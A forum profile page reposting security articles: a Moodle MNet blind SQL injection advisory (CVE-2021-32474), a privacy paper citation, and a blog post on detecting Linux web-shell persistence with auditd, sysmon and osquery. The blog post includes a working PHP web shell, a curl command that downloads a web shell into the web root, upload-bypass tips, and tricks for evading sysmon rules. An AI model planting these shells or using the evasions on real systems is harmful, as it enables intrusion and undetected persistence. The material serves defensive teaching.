Jump to content

Nytro

Administrators
  • Posts

    18592
  • Joined

  • Last visited

  • Days Won

    644

Everything posted by Nytro

  1. Moodle Blind SQL injection via MNet authentication 23-11-2021 - rekter0 Moodle is an opensource learning management system, popular in universities and workplaces largely used to manage courses, activities and learning content, with about 200 million users Versions affected 3.10 to 3.10.3, 3.9 to 3.9.6, 3.8 to 3.8.8, 3.5 to 3.5.17 CVE identifier CVE-2021-32474 # Summary What is Mnet? The Moodle network feature allows a Moodle administrator to establish a link with another Moodle or a Mahara site and to share some resources with the users of that Moodle. Official documentation: https://docs.moodle.org/310/en/MNet How ? Mnet communicate with peers through xmlrpc, and uses encrypted and signed messages with RSA 2048 So what ? auth/mnet/auth.php/keepalive_server xmlrpc method used to pass unsanitized user supplied parameters to SQL query => SQL injection Attack scenario ? 1- You compromised one moodle instance, and use it to launch attack on its peers 2- An evil moodle instance decides to attack its peers 3- For one reason or another some mnet instance keypairs are leaked # Vulnerability analysis Moodle uses singed and encrypted xmlrpc messages to communicate via MNet protocol /mnet/xmlrpc/client.php function send($mnet_peer) { global $CFG, $DB; if (!$this->permission_to_call($mnet_peer)) { mnet_debug("tried and wasn't allowed to call a method on $mnet_peer->wwwroot"); return false; } > $this->requesttext = xmlrpc_encode_request($this->method, $this->params, array("encoding" => "utf-8", "escaping" => "markup")); > $this->signedrequest = mnet_sign_message($this->requesttext); > $this->encryptedrequest = mnet_encrypt_message($this->signedrequest, $mnet_peer->public_key); $httprequest = $this->prepare_http_request($mnet_peer); > curl_setopt($httprequest, CURLOPT_POSTFIELDS, $this->encryptedrequest); xmlrpc message is first singed using private key /mnet/lib.php function mnet_sign_message($message, $privatekey = null) { global $CFG; $digest = sha1($message); $mnet = get_mnet_environment(); // If the user hasn't supplied a private key (for example, one of our older, // expired private keys, we get the current default private key and use that. if ($privatekey == null) { $privatekey = $mnet->get_private_key(); } // The '$sig' value below is returned by reference. // We initialize it first to stop my IDE from complaining. $sig = ''; $bool = openssl_sign($message, $sig, $privatekey); // TODO: On failure? $message = '<?xml version="1.0" encoding="iso-8859-1"?> <signedMessage> <Signature Id="MoodleSignature" xmlns="http://www.w3.org/2000/09/xmldsig#"> <SignedInfo> <CanonicalizationMethod Algorithm="http://www.w3.org/TR/2001/REC-xml-c14n-20010315"/> <SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/> <Reference URI="#XMLRPC-MSG"> <DigestMethod Algorithm="http://www.w3.org/2000/09/xmldsig#sha1"/> <DigestValue>'.$digest.'</DigestValue> </Reference> </SignedInfo> <SignatureValue>'.base64_encode($sig).'</SignatureValue> <KeyInfo> <RetrievalMethod URI="'.$CFG->wwwroot.'/mnet/publickey.php"/> </KeyInfo> </Signature> <object ID="XMLRPC-MSG">'.base64_encode($message).'</object> <wwwroot>'.$mnet->wwwroot.'</wwwroot> <timestamp>'.time().'</timestamp> </signedMessage>'; return $message; } The xml envelope along signature is then encrypted /mnet/lib.php function mnet_encrypt_message($message, $remote_certificate) { $mnet = get_mnet_environment(); // Generate a key resource from the remote_certificate text string $publickey = openssl_get_publickey($remote_certificate); if ( gettype($publickey) != 'resource' ) { // Remote certificate is faulty. return false; } // Initialize vars $encryptedstring = ''; $symmetric_keys = array(); // passed by ref -> &$encryptedstring &$symmetric_keys $bool = openssl_seal($message, $encryptedstring, $symmetric_keys, array($publickey)); $message = $encryptedstring; $symmetrickey = array_pop($symmetric_keys); $message = '<?xml version="1.0" encoding="iso-8859-1"?> <encryptedMessage> <EncryptedData Id="ED" xmlns="http://www.w3.org/2001/04/xmlenc#"> <EncryptionMethod Algorithm="http://www.w3.org/2001/04/xmlenc#arcfour"/> <ds:KeyInfo xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:RetrievalMethod URI="#EK" Type="http://www.w3.org/2001/04/xmlenc#EncryptedKey"/> <ds:KeyName>XMLENC</ds:KeyName> </ds:KeyInfo> <CipherData> <CipherValue>'.base64_encode($message).'</CipherValue> </CipherData> </EncryptedData> <EncryptedKey Id="EK" xmlns="http://www.w3.org/2001/04/xmlenc#"> <EncryptionMethod Algorithm="http://www.w3.org/2001/04/xmlenc#rsa-1_5"/> <ds:KeyInfo xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:KeyName>SSLKEY</ds:KeyName> </ds:KeyInfo> <CipherData> <CipherValue>'.base64_encode($symmetrickey).'</CipherValue> </CipherData> <ReferenceList> <DataReference URI="#ED"/> </ReferenceList> <CarriedKeyName>XMLENC</CarriedKeyName> </EncryptedKey> <wwwroot>'.$mnet->wwwroot.'</wwwroot> </encryptedMessage>'; return $message; } On the other side the server receives the xmlrpc request and processes it via verifying signature then decrypting the envelope /mnet/xmlrpc/server.php try { $plaintextmessage = mnet_server_strip_encryption($rawpostdata); $xmlrpcrequest = mnet_server_strip_signature($plaintextmessage); } catch (Exception $e) { mnet_debug('encryption strip exception thrown: ' . $e->getMessage()); exit(mnet_server_fault($e->getCode(), $e->getMessage(), $e->a)); } [...] [...] // Have a peek at what the request would be if we were to process it > $params = xmlrpc_decode_request($xmlrpcrequest, $method); mnet_debug("incoming mnet request $method"); [...] [...] if ((($remoteclient->request_was_encrypted == true) && ($remoteclient->signatureok == true)) || (($method == 'system.keyswap') || ($method == 'system/keyswap')) || (($remoteclient->signatureok == true) && ($remoteclient->plaintext_is_ok() == true))) { try { // main dispatch call. will echo the response directly > mnet_server_dispatch($xmlrpcrequest); mnet_debug('exiting cleanly'); exit; } catch (Exception $e) { mnet_debug('dispatch exception thrown: ' . $e->getMessage()); exit(mnet_server_fault($e->getCode(), $e->getMessage(), $e->a)); } } Then moodle dispatch xmlrequest method to the appropriate functions. Blind SQL Injection keepalive_server method used to pass client supplied parameters to SQL query unsanitized /auth/mnet/auth.php function keepalive_server($array) { global $CFG, $DB; $remoteclient = get_mnet_remote_client(); // We don't want to output anything to the client machine $start = ob_start(); // We'll get session records in batches of 30 $superArray = array_chunk($array, 30); $returnString = ''; foreach($superArray as $subArray) { $subArray = array_values($subArray); > $instring = "('".implode("', '",$subArray)."')"; > $query = "select id, session_id, username from {mnet_session} where username in $instring"; > $results = $DB->get_records_sql($query); if ($results == false) { // We seem to have a username that breaks our query: // TODO: Handle this error appropriately $returnString .= "We failed to refresh the session for the following usernames: \n".implode("\n", $subArray)."\n\n"; } else { foreach($results as $emigrant) { \core\session\manager::touch_session($emigrant->session_id); } } } $end = ob_end_clean(); if (empty($returnString)) return array('code' => 0, 'message' => 'All ok', 'last log id' => $remoteclient->last_log_id); return array('code' => 1, 'message' => $returnString, 'last log id' => $remoteclient->last_log_id); } array parameters for keepalive_server used to be processed via implode and concatinated into the SQL query leading to blind SQL injection risks. # Impact Blind SQL injection risks in keepalive_server xmlrpc method for MNet Authentication, Successful exploitation could have led to compromising the targeted moodle instance with RCE possibility. # Timeline 24-01-2021 - Reported 05-02-2021 - Vendor confirmed 17-05-2021 - Fixed in new release Sursa: https://r0.haxors.org/posts?id=26
  2. Personal information inference from voice recordings: User awareness and privacy concerns Jacob Leon Kröger, Leon Gellrich, Sebastian Pape, Saba Rebecca Brause and Stefan Ullrich Published Online: 20 Nov 2021 Page range: 6 - 27 Received: 31 May 2021 Accepted: 16 Sep 2021 DOI: https://doi.org/10.2478/popets-2022-0002© 2022 Jacob Leon Kröger et al., published by SciendoThis work is licensed under the Creative Commons Attribution-NonCommercial-NoDerivatives 3.0 License. Download Sursa: https://sciendo.com/article/10.2478/popets-2022-0002
  3. Hunting for Persistence in Linux (Part 1): Auditd, Sysmon, Osquery, and Webshells Nov 22, 2021 • Pepe Berba This blog series explores methods attackers might use to maintain persistent access to a compromised linux system. To do this, we will take an “offense informs defense” approach by going through techniques listed in the MITRE ATT&CK Matrix for Linux. I will try to: Give examples of how an attacker might deploy one of these backdoors Show how a defender might monitor and detect these installations By giving concrete implementations of these persistence techniques, I hope to give defenders a better appreciation of what exactly they are trying to detect, and some clear examples of how they can test their own alerting. Overview of blog series The rest of the blog post is structured with the following: Introduction to persistence Linux Auditing and File Integrity Monitoring How to setup and detect web shells Each persistence technique has two main parts: How to deploy the persistence techniques How to monitor and detect persistence techniques In this blog post we will only discuss web shell as a case study for logging and monitoring. We will discuss other techniques in succeeding posts. Throughout this series we will go through the following: Hunting for Persistence in Linux (Part 1): Auditing, Logging and Webshells Server Software Component: Web Shell Hunting for Persistence in Linux (Part 2): Account Creation and Manipulation Create Account: Local Account Valid Accounts: Local Accounts Account Manipulation: SSH Authorized Keys Hunting for Persistence in Linux (Part 3): Systemd, Timers, and Cron Create or Modify System Process: Systemd Service Scheduled Task/Job: Systemd Timers Scheduled Task/Job: Cron Hunting for Persistence in Linux (Part 4): Initialization Scripts, Shell Configuration, and others Boot or Logon Initialization Scripts: RC Scripts Event Triggered Execution: Unix Shell Configuration Modification Introduction to persistence Persistence consists of techniques that adversaries use to keep access to systems across restarts, changed credentials, and other interruptions that could cut off their access [1] Attackers employ persistence techniques so that exploitation phases do not need to be repeated. Remember, exploitation is just the first step for the attacker; they still need to take additional steps to fulfill their primary objective. After successfully gaining access to the machine, they need to pivot through the network and find a way to access and exfiltrate the crown jewels. During these post exploitation activities, the the attacker’s connection to the machine can be severed, and to regain access, the attacker might need to repeat the exploitation step. Redoing the exploitation might be difficult depending on the attacker vector: Sending an email with a malicious attachment: The victim wouldn’t open the same maldoc twice. You’d have to send another email and hope the victim will fall for it again. Using leaked credentials and keys: The passwords might be reset or the keys are revoked Exploiting servers with critical CVEs: The server can be patched Because of how difficult the exploitation can be, an attacker would want to make the most out of their initial access. To do this, they install backdoor access that reliably maintain access to the compromised machine even after reboots. With persistence installed, the attacker no longer need to rely on exploitation to regain access to the system. He might simply use the added account in the machine or wait for the reverse shell from a installed service. 0 Linux Logging and Auditing 0.1 File Integrity Monitoring The configuration changes needed to setup persistence usually require the attacker to touch the machine’s disk such as creating or modifying a file. This gives us an opportunity to catch the adversaries if we are able to lookout for file creation or modification related to special files of directories. For example, we can look for the creation of the web shell itself. This can be done by looking for changes within the web directory like /var/www/html . You can use the following: Wazuh’s File Integrity Monitoring: https://documentation.wazuh.com/current/learning-wazuh/detect-fs-changes.html Auditbeat’s File Integrity Monitoring: https://www.elastic.co/guide/en/beats/auditbeat/current/auditbeat-module-file_integrity.html auditd For the blog posts, we will be using mainly auditd, and auditbeats jointly. For instructions how to setup auditd and auditbeats see A02 in the appendix. 0.2 Auditd and Sysmon 0.2.1 What is sysmon and auditd? Two powerful tools to monitor the different processes in the OS are: auditd: the defacto auditing and logging tool for Linux sysmon: previously a tool exclusively for windows, a Linux port has recently been released Each of these tools requires you to configure rules for it to generate meaningful logs and alerts. We will use the following for auditd and sysmon respectively: https://github.com/Neo23x0/auditd https://github.com/microsoft/MSTIC-Sysmon/tree/main/linux For instructions how to install sysmon refer to appendix A01. 0.2.2 Comparison of sysmon and auditd At the time of writing this blog post, sysmon for linux has only been released for about a month now. I have no experience deploying sysmon at scale. Support for sysmon for linux is still in development for agents such as Linux Elastic Agent see issue here I’m using sysmonforlinux/buster,now 1.0.0 amd64 [installed] While doing the research for this blogpost, my comments so far are: sysmon’s rule definitions are much more flexible and expressive than auditd’s rules depending on user input fields such as CommandLine` can be bypassed just like other rules using string matching. In my testing, sysmon only has the event FileCreate which is triggered only when creating or overwriting of files. This means that file modification is not caught by Sysmon (such as appending to files). This means that file integrity monitoring is a weakness for Sysmon. I’ve experienced some problems with the rule title displayed in the logs. Auditd rules can filter up to the syscall level and sysmon filters based on highlevel predfined events such as ProcessCreation, and FileCreate. This means that if a particular activity that you are looking for is not mapped to a sysmon event, then you might have a hard time using sysmon to watch for it. Overall, I’m very optimistic with using adopting sysmon for linux in the future to look for interesting processes and connections but would still rely on other tools for file integrity monitoring such as auditd or auditbeats. In windows, having only FileCreate okay since you have other events specific to configuration changes in registry keys RegistryEvent, but in Linux since all of the configurations are essentially files, then file integrity monitoring plays a much bigger role in hunting for changes in sysmte configuration. The good thing with sysmon, is that rules for network activities and process creation is much more expressive compared to trying to to use a0, a1 for command line arguments in auditd. We will discuss some of the findings in the next blog posts but some examples of bypasses are: T1087.001_LocalAccount_Commands.xml looks for commands that have /etc/passwd to detect account enumeration. We can use cat /etc//passwd to bypass this rule T1070.006_Timestomp_Touch.xml looks for -r or --reference in touch commands to look for timestamp modification. We can use touch a -\r b to bypass this or even touch a -\-re\ference=b T1053.003_Cron_Activity.xml aims to monitor changes to crontab files. Using echo "* * * * * root touch /root/test" >> /etc/crontab will bypass this because it does not create or overwrite a file, and in Debian 10 using the standard crontab -e will not trigger this because the TargetFilename is +/var/spool/cron/crontabs and the extra + at the start causes the rule to fail. You can see the different architectures for auditd and sysmon here: Redhat CHAPTER 7. SYSTEM AUDITING Lead Microsoft Engineer Kevin Sheldrake Brings Sysmon to Linux We see from the diagram from linuxsecurity.com that Sysmon works on top of eBPF which is an interface for syscalls of the linux kernel. This serves as an abstraction when we define sysmon rules, but as a consequence, this flexibility gives attackers room to bypass some of the rules. For example, in sysmon, we can look for a FileCreate event with a specific TargetFilename. This is more flexible because you can define rules based on patterns or keywords and look for files that do no exist yet. However, string matches such as /etc/passwd can fail if the target name is not exactly that string. Unlike in auditd, what is being watched are actions on the inodes of the files and directories defined. This means that there is no ambiguity what specific files to watch. You can even look for read access to specific files. However, because it watches based on inodes, the files have to exist what the auditd service is started. This means you cannot watch files based on certain patterns like <home>/.ssh/authorized_keys 0.3 osquery Osquery allows us to investigate our endpoints using SQL queries. This simplifies the task of investigating and collecting evidence. Moreover, when paired with management interface like fleetdm allows you to take baselines of your environments and even hunt for adversaries. An example from a future blog post is looking for accounts that have a password set. If you expect your engineers to always SSH via public key, then you should not see active passwords. We can get this information using this query SELECT password_status, username, last_change FROM shadow WHERE password_status = 'active'; And get results for all your fleet something similar to this +-----------------+----------+-------------+ | password_status | username | last_change | +-----------------+----------+-------------+ | active | www-data | 18953 | +-----------------+----------+-------------+\ Now why does www-data have a password? Hmm… Installation instructions can be found in the official docs Once installed simply run osqueryi and run the SQL queries. 1 Server Software Component: Web Shell 1.1 Introduction to web shells MITRE: https://attack.mitre.org/techniques/T1505/003/ A web shell is backdoor installed in a web server by an attacker. Once installed, it becomes the initial foothold of the attacker, and if it’s never detected, then it becomes an easy way to persistent backdoor. In our example, to install a web shell we add a bad .php file inside/var/www/html Some reasons this can happen are: the web application has a vulnerable upload API the web application has a critical RCE vulnerability the attacker has existing access that can modify the contents of the web root folder If the attacker can upload malicious files that run as php, then he can get remote access to the machine. One famous example of this is the 2017 Equifax Data Breach. You can read the report, but here’s my TLDR: The web server was running Apache Struts containing a critical RCE vulnerability. Attackers used this RCE to drop web shells which they used to gain access to sensitive data and exfiltrate the data. Around 30 different web shells was used in the breach. See the following resources: https://owasp.org/www-community/vulnerabilities/Unrestricted_File_Upload https://portswigger.net/web-security/os-command-injection 1.2 Installing your own web shells Note: If you want to try this out you can follow the setup instructions in the appendix A00. Assume we already have RCE, we add a file phpinfo.php that will contain our web shell. vi /var/www/html/phpinfo.php Choose any of the examples php web shells. For example: <html> <body> <form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>"> <input type="TEXT" name="cmd" id="cmd" size="80"> <input type="SUBMIT" value="Execute"> </form> <pre> <?php if(isset($_GET['cmd'])) { system($_GET['cmd']); } ?> </pre> Now anyone with access to http://x.x.x.x/phpinfo.php would be able to access the web shell and run arbitrary commands. What if you don’t have shell access? You might be able to install a web shell through an unrestricted upload. Upload your php backdoor as image.png.php and the backdoor might be accessible on [http://x.x.x.x/](http://x.x.x.x/)uploads/image.png.php . Another possible command that you can use is curl https://raw.githubusercontent.com/JohnTroony/php-webshells/master/Collection/PHP_Shell.php -o /var/www/html/backdoor_shell.php 1.3 Detection: Creation or modification of php files Using auditbeat’s file integrity monitoring For some web applications, we might be able to monitor the directories of our web app in auditbeat’s file integrity monitoring. - module: file_integrity paths: - /bin - /usr/bin - /sbin - /usr/sbin - /etc - /var/www/html # <--- Add - module: system datasets: - package # Installed, updated, and removed packages When using _auditbeat’_s file integrity monitoring module, we see that looking at event.module: file_integrity Our vi command “moved” the file. In this case, moved is the same as updated because of how vi works. Where it creates a temporary file /var/www/html/phpinfo.php.swpand if you want to save the file it replaces /var/www/html/phpinfo.php An example of a command that will result in a created log would be if we ran curl https://raw.githubusercontent.com/JohnTroony/php-webshells/master/Collection/PHP_Shell.php -o /var/www/html/backdoor_shell.php Using audit to monitor changes We can add the following rule to auditd -w /var/www/html -p wa -k www_changes And you can search for all write or updates to files in /var/www/html using the filter tags: www_changes or key="www_changes" The raw auditd logs looks like this type=SYSCALL msg=audit(1637597150.454:10650): arch=c000003e syscall=257 success=yes exit=4 a0=ffffff9c a1=556e6969fbc0 a2=241 a3=1b6 items=2 ppid=12962 pid=13086 auid=1000 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=pts0 ses=11 comm="curl" exe="/usr/bin/curl" subj==unconfined key="www_changes", type=PATH msg=audit(1637597150.454:10650): item=0 name="/var/www/html" inode=526638 dev=08:01 mode=040755 ouid=0 ogid=0 rdev=00:00 nametype=PARENT cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0, type=PATH msg=audit(1637597150.454:10650): item=1 name="backdoor_shell.php" inode=527243 dev=08:01 mode=0100644 ouid=0 ogid=0 rdev=00:00 nametype=CREATE cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0, type=PROCTITLE msg=audit(1637597150.454:10650): proctitle=6375726C0068747470733A2F2F7261772E67697468756275736572636F6E74656E742E636F6D2F4A6F686E54726F6F6E792F7068702D7765627368656C6C732F6D61737465722F436F6C6C656374696F6E2F5048505F5368656C6C2E706870002D6F006261636B646F6F725F7368656C6C2E706870 This allows us to note: euid=0 effective UID of the action exe="/usr/bin/curl” the command that was run name="/var/www/html" ... name="backdoor_shell.php" the output file key="www_changes" the key of the auditd alert that was fired proctitle=63757... is the hex encoded title of the process which is our original curl command Notes on file integrity monitoring for detecting web shells There are other ways to check. For example, if there is version control (like git), you can compare the current state with a known good state and investigate the differences. However, if there are folders where we expect specific files to be written and modified often, such as upload directories, then file integrity monitoring might not be fully effective. We might have to fine-tune this alert and try to exclude these upload directories to reduce noise, but how would you detect web shells uploaded within the upload directory! We need to look for more effective means of detecting web shells. 1.4 Detection: Looking for command execution for www-data using auditd When we run webservers such as nginx the service will run under the user www-data . On regular operations, we should not expect to see that user running commands such as whoami or ls However, if there was a web shell, these are some of the commands we are most likely going to see. Therefore, we should try to use auditd to detect these. Here is an auditd rule that will look for execve syscalls by www-data (euid=33) and we tag this as detect_execve_www -a always,exit -F arch=b64 -F euid=33 -S execve -k detect_execve_www -a always,exit -F arch=b32 -F euid=33 -S execve -k detect_execve_www We run the following commands on our webshell whoami id pwd ls -alh We get the following logs from auditd as parsed by auditbeats. Here is an example of a raw auditd log for whoami type=SYSCALL msg=audit(1637597946.536:10913): arch=c000003e syscall=59 success=yes exit=0 a0=7fb62eb89519 a1=7ffd0906fa70 a2=555f6f1d7f50 a3=1 items=2 ppid=7182 pid=13281 auid=4294967295 uid=33 gid=33 euid=33 suid=33 fsuid=33 egid=33 sgid=33 fsgid=33 tty=(none) ses=4294967295 comm="sh" exe="/usr/bin/dash" subj==unconfined key="detect_execve_www", type=EXECVE msg=audit(1637597946.536:10913): argc=3 a0="sh" a1="-c" a2="whoami", type=PATH msg=audit(1637597946.536:10913): item=0 name="/bin/sh" inode=709 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0, type=PATH msg=audit(1637597946.536:10913): item=1 name="/lib64/ld-linux-x86-64.so.2" inode=1449 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0, type=PROCTITLE msg=audit(1637597946.536:10913): proctitle=7368002D630077686F616D69Appendix This allows us to note: euid=33, uid=33 which is www-data comm="sh" exe="/usr/bin/dash” the shell argsc=3 a0="sh" a1="-c" a2="whoami" the commands run on the shell key="detect_execve_www" the key of the auditd alert that was fired Note regarding detect_execve_www Let’s say you decide to use the default rules found in https://github.com/Neo23x0/auditd/blob/master/audit.rules If you try to use ready-made detection rules such as those that come with sigma then you might try to use lnx_auditd_web_rce.yml. If you use this query using the rules from Neo23x0 then you will fail to detect any web shells. This is because the detection rule is detection: selection: type: 'SYSCALL' syscall: 'execve' key: 'detect_execve_www' condition: selection Notice that this filters for the key detect_execve_www but this exact key is not defined anywhere in Neo23x0’s audit.rules ! This is why you should always test your configurations and see if it detects the known bad. In the Neo23x0’s rules, the closest thing you might get are commented out by default ## Suspicious shells #-w /bin/ash -p x -k susp_shell #-w /bin/bash -p x -k susp_shell #-w /bin/csh -p x -k susp_shell #-w /bin/dash -p x -k susp_shell #-w /bin/busybox -p x -k susp_shell #-w /bin/ksh -p x -k susp_shell #-w /bin/fish -p x -k susp_shell #-w /bin/tcsh -p x -k susp_shell #-w /bin/tclsh -p x -k susp_shell #-w /bin/zsh -p x -k susp_shell In this case, our web shell used /bin/dash because it is the default shell used by /bin/shin the current VM I tested this on. So the relevant rule would be -w /bin/dash -p x -k susp_shell But this relies on the usage of /bin/dash buit if the web shell is able to use other shells, then this specific alert will fail. Test your auditd rules on specific scenarios to ensure that it works as expected. For more information on how to write rules for auditd see: https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/7/html/security_guide/sec-defining_audit_rules_and_controls https://www.redhat.com/sysadmin/configure-linux-auditing-auditd 1.5 Detection: Looking for command execution for www-data using sysmon MSTIC-Sysmon has two rules for this found individually: T1505.003 T1059.004 Where we can see: Process creation using /bin/bash, /bin/dash, or/bin/sh Process creation with the parent process dash or nginx or … containing and the current command is one of whoami , ifconfig , /usr/bin/ip , etc. If we run whoami in the setup we have, the first rule that will be triggered would T1059.004,TechniqueName=Command and Scripting Interpreter: Unix Shell because of the order of the rules. <Event> <System> <Provider Name="Linux-Sysmon" Guid="{ff032593-a8d3-4f13-b0d6-01fc615a0f97}"/> <EventID>1</EventID> <Version>5</Version> <Channel>Linux-Sysmon/Operational</Channel> <Computer>sysmon-test</Computer> <Security UserId="0"/> </System> <EventData> <Data Name="RuleName">TechniqueID=T1059.004,TechniqueName=Command and Scriptin</Data> <Data Name="UtcTime">2021-11-23 14:06:07.116</Data> <Data Name="ProcessGuid">{717481a5-f54f-619c-2d4e-bd5574550000}</Data> <Data Name="ProcessId">11662</Data> <Data Name="Image">/usr/bin/dash</Data> <Data Name="FileVersion">-</Data> <Data Name="Description">-</Data> <Data Name="Product">-</Data> <Data Name="Company">-</Data> <Data Name="OriginalFileName">-</Data> <Data Name="CommandLine">sh -c whoami</Data> <Data Name="CurrentDirectory">/var/www/html</Data> <Data Name="User">www-data</Data> <Data Name="LogonGuid">{717481a5-0000-0000-2100-000000000000}</Data> <Data Name="LogonId">33</Data> <Data Name="TerminalSessionId">4294967295</Data> <Data Name="IntegrityLevel">no level</Data> <Data Name="Hashes">-</Data> <Data Name="ParentProcessGuid">{00000000-0000-0000-0000-000000000000}</Data> <Data Name="ParentProcessId">10242</Data> <Data Name="ParentImage">-</Data> <Data Name="ParentCommandLine">-</Data> <Data Name="ParentUser">-</Data> </EventData> </Event> Here we see /bin/dash being executed that is why the rule was triggered. Afterwards, the rule T1505.003,TechniqueName=Server Software Component: Web Shell is triggered because of whoami . Here is the log for it. I’ve removed some fields for brevity. <Event> <System> <Provider Name="Linux-Sysmon" Guid="{ff032593-a8d3-4f13-b0d6-01fc615a0f97}"/> <EventID>1</EventID> </System> <EventData> <Data Name="RuleName">TechniqueID=T1505.003,TechniqueName=Serv</Data> <Data Name="UtcTime">2021-11-23 14:06:07.118</Data> <Data Name="ProcessGuid">{717481a5-f54f-619c-c944-fd0292550000}</Data> <Data Name="ProcessId">11663</Data> <Data Name="Image">/usr/bin/whoami</Data> <Data Name="CommandLine">whoami</Data> <Data Name="CurrentDirectory">/var/www/html</Data> <Data Name="User">www-data</Data> <Data Name="LogonGuid">{717481a5-0000-0000-2100-000000000000}</Data> <Data Name="LogonId">33</Data> <Data Name="ParentProcessId">11662</Data> <Data Name="ParentImage">/usr/bin/dash</Data> <Data Name="ParentCommandLine">sh</Data> <Data Name="ParentUser">www-data</Data> </EventData> </Event> Now with this knowledge, we can bypass T1505.003 sysmon rule. By running system("/bin/bash whoami") so that the parent image of the whoami command would not be dash . This would trigger two T1059.004 alerts. Just for an exercise, if we want to replicate our detect_execve_www in sysmon, we can use the following rule <RuleGroup name="" groupRelation="or"> <ProcessCreate onmatch="include"> <Rule name="detect_shell_www" groupRelation="and"> <User condition="is">www-data</User> <Image condition="contains any">/bin/bash;/bin/dash;/bin/sh;whoami</Image> </Rule> </ProcessCreate> </RuleGroup> And if we want to do basic file integrity monitoring with sysmon we can use <FileCreate onmatch="include"> <Rule name="change_www" groupRelation="or"> <TargetFilename condition="begin with">/var/www/html</TargetFilename> </Rule> </FileCreate> For more information about writing your own sysmon rules you can look at: https://docs.microsoft.com/en-us/sysinternals/downloads/sysmon#configuration-files https://techcommunity.microsoft.com/t5/sysinternals-blog/sysmon-the-rules-about-rules/ba-p/733649 https://github.com/SwiftOnSecurity/sysmon-config/blob/master/sysmonconfig-export.xml https://github.com/microsoft/MSTIC-Sysmon 1.6 Hunting for web shells using osquery For osquery, we might not be able to “find” the web shells itself, but we might be able to find evidence of the webshell. If an attacker uses a web shell, it is possible they will try to establish a reverse shell. If so, we should be an outbound connection from the web server to the attacker. SELECT pid, remote_address, local_port, remote_port, s.state, p.name, p.cmdline, p.uid, username FROM process_open_sockets AS s JOIN processes AS p USING(pid) JOIN users USING(uid) WHERE s.state = 'ESTABLISHED' OR s.state = 'LISTEN'; This look for processes with sockets that have established connections or has a listening port. +-------+-----------------+------------+-------------+-------------+-----------------+----------------------------------------+------+----------+ | pid | remote_address | local_port | remote_port | state | name | cmdline | uid | username | +-------+-----------------+------------+-------------+-------------+-----------------+----------------------------------------+------+----------+ | 14209 | 0.0.0.0 | 22 | 0 | LISTEN | sshd | /usr/sbin/sshd -D | 0 | root | | 468 | 0.0.0.0 | 80 | 0 | LISTEN | nginx | nginx: worker process | 33 | www-data | | 461 | 74.125.200.95 | 51434 | 443 | ESTABLISHED | google_guest_ag | /usr/bin/google_guest_agent | 0 | root | | 8563 | 10.0.0.13 | 39670 | 9200 | ESTABLISHED | auditbeat | /usr/share/auditbeat/bin/auditbeat ... | 0 | root | | 17770 | 6.7.8.9 | 22 | 20901 | ESTABLISHED | sshd | sshd: user@pts/0 | 1000 | user | | 17776 | 1.2.3.4 | 51998 | 1337 | ESTABLISHED | bash | bash | 33 | www-data | +-------+-----------------+------------+-------------+-------------+-----------------+----------------------------------------+------+----------+ Notice we that we see exposed port 22 and port 80 which is normal. We see outbound connections for some binaries used by GCP (my VM is hosted in GCP) as well as the auditbeat service that ships my logs to the SIEM. We also see an active SSH connection from 6.7.8.9 which might be normal. What should catch your eye is the connection pid =17776. It is an outbound connection to port 1337 running shell by www-data! This is probably an active reverse shell! What’s next We’ve discussed basic of monitoring and logging with sysmon, osqueryu, auditd and auditbeats and we have used the case study of how to detect the creation and usage of web shells. In the next blog post we will go through account creation and manipulation. Appendix A00 Setup nginx and php If you want to try this out on your own VM, you need to first setup an nginx server that is configured to use php. (We follow this guide). You need to install nginx and php sudo apt-get update sudo apt-get install nginx sudo apt-get install php-fpm sudo vi /etc/php/7.3/fpm/php.ini # cgi.fix_pathinfo=0 sudo systemctl restart php7.3-fpm sudo vi /etc/nginx/sites-available/default # configure nginx to use php see next codeblock sudo systemctl restart nginx The nginx config might look something like this server { listen 80 default_server; listen [::]:80 default_server; root /var/www/html; index index.html index.htm index.nginx-debian.html; server_name _; location / { try_files $uri $uri/ =404; } location ~ \\.php$ { include snippets/fastcgi-php.conf; fastcgi_pass unix:/run/php/php7.3-fpm.sock; } } Now you should have a web server listening in port 80 that can run php code. Any file that ends with .php will be run as php code. A01 Setup sysmon for linux For sysmon for linux, I was on Debian 10, so based on https://github.com/Sysinternals/SysmonForLinux/blob/main/INSTALL.md wget -qO- https://packages.microsoft.com/keys/microsoft.asc | gpg --dearmor > microsoft.asc.gpg sudo mv microsoft.asc.gpg /etc/apt/trusted.gpg.d/ wget -q https://packages.microsoft.com/config/debian/10/prod.list sudo mv prod.list /etc/apt/sources.list.d/microsoft-prod.list sudo chown root:root /etc/apt/trusted.gpg.d/microsoft.asc.gpg sudo chown root:root /etc/apt/sources.list.d/microsoft-prod.list sudo apt-get update sudo apt-get install apt-transport-https sudo apt-get update sudo apt-get install sysmonforlinux I used microsoft/MSTIC-Sysmon git clone https://github.com/microsoft/MSTIC-Sysmon.git cd MSTIC-Sysmon/linux/configs sudo sysmon -accepteula -i main.xml # if you are experimenting and want to see all sysmon logs use # sudo sysmon -accepteula -i main.xml Logs should now be available in /var/log/syslog If you want to add rules to main.xml then you can modify it and then reload the config and restart sysmon sudo sysmon -c main.xml sudo sysmtectl restart sysmon A02 Setup auditbeats and auditd for linux Note: Setting up a local elasticsearch clustering is out of scope of this blog post. Elastic has good documentation for auditbeats: https://www.elastic.co/guide/en/beats/auditbeat/7.15/auditbeat-installation-configuration.html curl -L -O https://artifacts.elastic.co/downloads/beats/auditbeat/auditbeat-7.15.2-amd64.deb sudo dpkg -i auditbeat-7.15.2-amd64.deb Modify /etc/auditbeat/auditbeat.yml Add the config for elasticsearch output.elasticsearch: hosts: ["10.10.10.10:9200"] username: "auditbeat_internal" password: "YOUR_PASSWORD" To configure auditd rules, validate location of the audit_rule_files # ... - module: auditd audit_rule_files: [ 